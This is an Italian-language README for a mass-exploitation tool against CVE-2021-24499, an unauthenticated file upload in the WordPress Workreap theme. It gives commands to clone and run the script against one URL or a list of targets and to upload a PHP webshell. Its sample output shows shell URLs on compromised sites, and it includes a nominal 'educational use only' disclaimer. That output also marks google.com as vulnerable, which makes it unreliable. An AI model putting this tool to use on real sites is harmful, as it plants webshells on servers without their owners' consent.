
WordPress Theme Workreap 2.2.2 - Upload non autenticato che porta all'esecuzione remota di codice
WordPress Theme Workreap 2.2.2 - Caricamento File Non Autenticato che Porta a Esecuzione di Codice Remota
Un potente e accurato strumento di sfruttamento di massa per la vulnerabilità CVE-2021-24499 nel tema WordPress Workreap. Questo exploit consente il caricamento di file non autenticato che può portare a Remote Code Execution (RCE).
CVE-2021-24499 è una vulnerabilità critica nel tema WordPress Workreap (versione 2.2.2 e precedenti) che consente a utenti non autenticati di caricare file arbitrari, inclusi file PHP, tramite l'azione AJAX workreap_award_temp_file_uploader. Ciò può portare a Remote Code Execution (RCE) sul server di destinazione.
Versioni Vulnerabili: Tutte le versioni fino alla 2.2.2 inclusa
Punteggio CVSS: Critico
curlopts.php o shell.php (webshell PHP)git clone https://github.com/jayhutajulu1/CVE-2021-24499.git
cd CVE-2021-24499
chmod +x exploit.sh
opts.php o shell.php nella stessa directory (la tua webshell PHP)Singolo Target:
./exploit.sh -u http://target.com
Target Multipli (da file):
./exploit.sh -l targets.txt
Mostra Aiuto:
./exploit.sh --help
| Opzione | Descrizione |
|---|---|
-u URL | Sfrutta un singolo URL target |
-l FILE | Sfrutta più target da un file (un URL per riga) |
--help | Mostra il menu di aiuto |
Crea un file di testo con un URL per riga:
http://target1.com
https://target2.com
http://target3.com
$ ./exploit.sh -u https://domain.com
WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution | CVE-2021-24499
Made by Jay Maranatha Hutajulu
https://domain.com/ >> VULNERABLE!
--> SHELL: https://domain.com//wp-content/uploads/workreap-temp/shell.php
$ ./exploit.sh -l targets.txt
WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution | CVE-2021-24499
Made by Jay Maranatha Hutajulu
https://domain.com >> NOT VULNERABLE!
https://www.google.com >> VULNERABLE!
https://www.domain.com >> NOT VULNERABLE!
https://google.com >> VULNERABLE!
Questo strumento è fornito solo per scopi educativi e di test autorizzati.
Utilizzando questo strumento, accetti di usarlo solo per legittimi test di sicurezza e scopi di ricerca.
Autore: Jay Maranatha Hutajulu
Questo progetto è concesso in licenza sotto la MIT License - vedi il file LICENSE per i dettagli.
Contributi, segnalazioni di problemi e richieste di funzionalità sono benvenuti! Sentiti libero di controllare la pagina delle issues.
Se trovi utile questo strumento, considera di assegnargli una stella ⭐
Ricorda: Usa sempre gli strumenti di sicurezza in modo responsabile ed etico. Buon hacking! 🚀